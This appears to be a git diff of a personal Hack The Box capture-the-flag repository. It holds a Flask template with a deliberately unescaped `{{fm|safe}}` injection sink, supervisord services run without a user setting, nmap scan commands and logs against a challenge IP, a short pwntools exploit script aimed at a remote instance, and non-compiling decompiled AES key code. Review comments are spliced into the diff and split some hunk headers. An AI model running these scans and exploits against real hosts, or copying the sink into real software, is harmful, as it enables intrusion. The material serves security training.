n=Object(e.find)(this.blocks,{index:t});n&&n.clearCharacter()}clearScreen(){this.blocks.forEach(t=>{this.clearCharacter({blockIndex:t.index})})}blinkCursor({blockIndex:t=0,stop:n=!1}={}){const r=Object(e.find)(this.blocks,{index:t});if(r){if(null!==this.activeBlockIndex){Object(e.find)(this.blocks,{index:this.activeBlockIndex}).toggleCursorBlink(!0)}this.activeBlockIndex=t,r.toggleCursorBlink(n)}}}n.default=c}]).default})); +//# sourceMappingURL=index.js.map diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/templates/index.html b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/templates/index.html new file mode 100644 index 00000000..30a50ab9 --- /dev/null +++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/challenge/templates/index.html @@ -0,0 +1,139 @@ + + + + + + + + +Gamma Monitoring Panel + + + + + + + + + + + + + + +
+

Gamma Monitoring System


+ +
+ +
+ +

+ + + + +



{{fm|safe}} +
+
+ + + + + + + +
diff --git a/LaokoonHaxorcist/hw_invasion/hw_invasion/config/supervisord.conf b/LaokoonHaxorcist/hw_invasion/hw_invasion/config/supervisord.conf
new file mode 100644
index 00000000..d6b22863
--- /dev/null
+++ b/LaokoonHaxorcist/hw_invasion/hw_invasion/config/supervisord.conf
@@ -0,0 +1,27 @@
+[supervisord]
+nodaemon=true
+logfile=/dev/null
+logfile_maxbytes=0
+pidfile=/run/supervisord.pid
+
+[program:flask]
+command=python3 /app/app.py
+stdout_logfile=/dev/stdout
+stdout_logfile_maxbytes=0
+stderr_logfile=/dev/stderr
+stderr_logfile_maxbytes=0
+
+[program:modbus]
+command=python3 /app/server.py
+stdout_logfile=/dev/stdout
+stdout_logfile_maxbytes=0
+stderr_logfile=/dev/stderr
+stderr_logfile_maxbytes=0
+
+[program:bot]
+command=python3 /app/bot.py
+stdout_logfile=/dev/stdout
+stdout_logfile_maxbytes=0
+stderr_logfile=/dev/stderr
+stderr_logfile_maxbytes=0
+
diff --git a/LaokoonHaxorcist/pwn_formula/flag.txt b/LaokoonHaxorcist/pwn_formula/flag.txt
new file mode 100644
index 00000000..8c8ec324
--- /dev/null
+++ b/LaokoonHaxorcist/pwn_formula/flag.txt
@@ -0,0 +1 @@
+HTB{f4k3_fl4g_4_t35t1ng}
diff --git a/LaokoonHaxorcist/pwn_formula/formula b/LaokoonHaxorcist/pwn_formula/formula
new file mode 100755
index 00000000..da28b769
Binary files /dev/null and b/LaokoonHaxorcist/pwn_formula/formula differ
diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/local.txt b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/local.txt
new file mode 100644
index 00000000..e69de29b
diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/proof.txt b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/report/proof.txt
new file mode 100644
index 00000000..e69de29b
diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_commands.log b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_commands.log
new file mode 100644
index 00000000..cc0779cd
--- /dev/null
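Review bot: `{{fm|safe}}` near the end of the template switches off Jinja autoescaping for `fm`, so any markup in that value is rendered as live HTML in the monitoring panel. The view that fills `fm` is not part of this hunk, so whether it can carry request- or device-supplied text cannot be confirmed from here; if it can, this is a script-injection sink. Unless `fm` is a fixed fragment built entirely on the server, render it escaped with `{{ fm }}` and keep the surrounding markup in the template itself.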
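Review bot: None of the three `[program:*]` sections sets `user=`, so `flask`, `modbus` and `bot` all inherit the account supervisord itself runs as, which is root if the container starts it that way (the Dockerfile is not in this hunk). A flaw in the web app would then carry the same privileges as the supervisor and the two sibling services. Give each program a dedicated unprivileged account, e.g. `user=<service-account>` under every `[program:*]` header, and keep only supervisord itself privileged.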
+++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_commands.log
@@ -0,0 +1,4 @@
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131
+
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131
+
diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt
new file mode 100644
index 00000000..a6a9e652
--- /dev/null
+++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt
@@ -0,0 +1 @@
+# Nmap 7.93 scan initiated Sat Oct 28 13:10:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_full_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml 10.129.243.131
diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt
new file mode 100644
index 00000000..a7274f97
--- /dev/null
+++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt
@@ -0,0 +1 @@
+# Nmap 7.93 scan initiated Sat Oct 28 13:10:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/_quick_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml 10.129.243.131
diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml
new file mode 100644
index 00000000..4559abe7
--- /dev/null
+++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml
@@ -0,0 +1,17 @@
+ + + + + + + + + + + + + + + + +
diff --git a/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml
new file mode 100644
index 00000000..f19ead27
--- /dev/null
+++ b/LaokoonHaxorcist/pwn_formula/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml
@@ -0,0 +1,17 @@
+ + + + + + + + + + + + + + + + +
diff --git a/LaokoonHaxorcist/pwn_formula/solve.py b/LaokoonHaxorcist/pwn_formula/solve.py
new file mode 100644
index 00000000..b8131a67
--- /dev/null
+++ b/LaokoonHaxorcist/pwn_formula/solve.py
@@ -0,0 +1,9 @@
+from pwn import *
+
+
+# io = process("./formula")
+
+io = remote("94.237.59.206", 35564)
+io.recvuntil("[Marty]:")
+io.send(b'\x00' *8)
+io.interactive()
diff --git a/LaokoonHaxorcist/rev_stringtheory/stringtheory b/LaokoonHaxorcist/rev_stringtheory/stringtheory
new file mode 100644
index 00000000..2849acbe
Binary files /dev/null and b/LaokoonHaxorcist/rev_stringtheory/stringtheory differ
diff --git a/LaokoonHaxorcist/rev_threekeys/ape.c b/LaokoonHaxorcist/rev_threekeys/ape.c
new file mode 100644
index 00000000..46252418
--- /dev/null
+++ b/LaokoonHaxorcist/rev_threekeys/ape.c
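Review bot: `io.recvuntil("[Marty]:")` in solve.py passes a `str` where the tube API works on bytes, so under Python 3 pwntools has to assume an encoding and warns about it; write `io.recvuntil(b"[Marty]:")` to match the bytes literal used on the following line. The address in `remote("94.237.59.206", 35564)` is committed as a literal and presumably belongs to a short-lived instance; reading host and port from the command line keeps the file reusable and keeps target addresses out of the repository history.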
@@ -0,0 +1,60 @@
+#include
+
+
+KEY1 = { 0xf2, 0xe7, 0xbf, 0xd7, 0x53, 0xc6, 0x4b, 0x26, 0x97, 0xf9, 0x69, 0x87, 0xe6, 0x84, 0x28, 0xe8 }
+KEY2 = { 0xdc, 0xf9, 0x90, 0x26, 0x92, 0x27, 0x33, 0x67, 0x24, 0x08, 0xc6, 0x45, 0x51, 0xc7, 0x3a, 0x33 }
+KEY3 = { 0xee, 0x31, 0xce, 0xd8, 0x10, 0x70, 0x40, 0xa0, 0xd9, 0x53, 0xcf, 0x57, 0x32, 0x79, 0x73, 0xd5 }
+int decrypt(EVP_PKEY_CTX *ctx,uchar *out,size_t *outlen,uchar *in,size_t inlen)
+
+{
+ int local_c;
+
+ for (local_c = 0; local_c < (int)outlen; local_c = local_c + 1) {
+ AES_decrypt((uchar *)(ctx + (local_c << 4)),out + (local_c << 4),(AES_KEY *)in);
+ }
+ return local_c;
+}
+
+
+
+AES_KEY * the_third_key(void)
+
+{
+ AES_KEY *key;
+
+ key = (AES_KEY *)malloc(0xf4);
+ AES_set_decrypt_key(KEY1,0x80,key);
+ return key;
+}
+
+
+AES_KEY * the_second_key(void)
+
+{
+ AES_KEY *key;
+
+ key = (AES_KEY *)malloc(0xf4);
+ AES_set_decrypt_key(KEY2,0x80,key);
+ return key;
+}
+
+
+AES_KEY * the_first_key(void)
+
+{
+ AES_KEY *key;
+
+ key = (AES_KEY *)malloc(0xf4);
+ AES_set_decrypt_key(KEY3,0x80,key);
+ return key;
+}
+
+int main(){
+ undefined8 *crypt;
+ crypt = (undefined8 *)malloc(0x20);
+ FLAG = (char *)malloc(0x20);
+ *crypt = 0xa646484365c8eb8c;
+ crypt[1] = 0x9f803f2f42e80598;
+ crypt[2] = 0x3ed81a287db3c9a8;
+ crypt[3] = 0x6cb78fe92b1abaaa;
+}
\ No newline at end of file
diff --git a/LaokoonHaxorcist/rev_threekeys/threekeys b/LaokoonHaxorcist/rev_threekeys/threekeys
new file mode 100755
index 00000000..e819d9eb
Binary files /dev/null and b/LaokoonHaxorcist/rev_threekeys/threekeys differ
diff --git a/LaokoonHaxorcist/rev_threekeys/threekeys.patched b/LaokoonHaxorcist/rev_threekeys/threekeys.patched
new file mode 100755
index 00000000..e6a033b3
Binary files /dev/null and b/LaokoonHaxorcist/rev_threekeys/threekeys.patched differ
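Review bot: ape.c cannot compile as committed: `KEY1`, `KEY2` and `KEY3` have no type and no terminating `;`, and `FLAG`, `uchar` and `undefined8` are never declared, so the file reads as a raw decompiler paste rather than source (the `#include` line also shows no header here, which may be a rendering loss). Give the keys real declarations such as `static const unsigned char KEY1[16] = { ... };` and open the file with a comment saying the listing is decompiler output kept for reference. In `decrypt`, the loop bound `(int)outlen` casts a `size_t *` to `int`; if that argument is really a block count, declare it as a count and compare it directly. The three key helpers also pass the result of `malloc(0xf4)` to `AES_set_decrypt_key` without a NULL check.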